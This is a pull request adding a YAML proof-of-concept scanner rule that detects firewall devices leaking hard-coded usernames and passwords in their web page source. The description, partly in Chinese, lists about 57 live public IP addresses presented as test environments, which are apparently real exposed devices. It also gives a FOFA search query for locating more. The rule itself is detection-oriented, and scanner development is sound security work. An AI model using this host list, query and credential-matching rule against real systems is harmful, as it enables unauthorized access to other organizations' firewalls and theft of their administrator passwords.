### PR TITLE
Create firewall-password-leak.yml

### DIFF
--- a/pocs/firewall-password-leak.yml
+++ b/pocs/firewall-password-leak.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-firewall-password-leak
+rules:
+  - method: GET
+    follow_redirects: true
+    path: "/"
+    expression: |
+      response.body.bcontains(b"var dkey_verify = Get_Verify_Info(hex_md5") && response.body.bcontains(b"get_dkey_passwd") && "\"name\":\"\\w+\",\"password\":\"\\w{15,33}\",\"lastpwdtime".bmatches(response.body)
+detail:
+  author: tangshoupu
+  info: 防火墙硬编码漏洞
+  links:
+    - https://forum.butian.net/share/177


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
主要检测 多家防火墙设备存在信息泄露的漏洞
虽然检测原理与 https://github.com/chaitin/xray/pull/1192/  相似
但他的的poc限制太死，无法检测防火墙问题

## 测试环境
https://60.255.230.247:9090
https://60.255.230.248:9090
https://60.8.205.110:9090
https://222.217.3.216:9090
https://111.59.92.115:9090
https://60.255.230.247:9091
https://113.57.117.10:1443
https://60.255.230.248:9091
https://60.255.230.246:9091
https://119.39.136.41:9090
https://111.59.92.115:9091
https://61.182.219.116
https://222.83.211.182:9090
https://116.131.147.214:9090
https://221.182.202.66
https://221.206.198.127:9091
https://101.95.184.210:9091
https://60.255.230.246:9090
https://171.221.227.194:9090
https://222.84.119.2:9090
https://101.231.72.127:8443
https://61.164.34.171:9091
https://60.213.232.218:9091
https://122.227.55.70:9090
https://111.75.209.230:9091
https://111.75.209.229:9091
https://58.252.58.179:9090
https://60.8.205.106:9090
http://113.56.119.73:9000
https://116.10.142.240:9090
https://122.227.47.82:9090
http://221.182.202.66:81
https://61.164.34.171:9090
https://171.221.227.196:9090
https://112.12.9.42:9090
https://116.131.147.214:9091
https://120.236.230.106:9091
https://222.217.3.216:9091
https://117.156.162.19:9090
https://218.29.7.150:9091
https://116.10.142.240:9091
https://123.177.21.199:9091
http://222.223.142.154:8889
https://219.139.51.133:9091
https://218.90.161.243:9091
https://210.68.95.88:9091
https://119.39.136.41:9091
https://183.131.141.74:9091
https://218.75.40.66:9091
https://124.226.3.11:9090
https://218.90.161.242:9090
https://222.218.136.104:9091
https://1.197.108.247:9091
https://210.63.211.145:9091
https://61.185.77.94:9091
https://222.218.136.104:9090
https://112.103.162.153:9091



## 备注
fofa: "var dkey_verify = Get_Verify_Info(hex_md5"

![image](https://user-images.githubusercontent.com/50769953/123206709-ae146380-d4ab-11eb-826d-c66dcc8e8095.png)


影响面积非常大
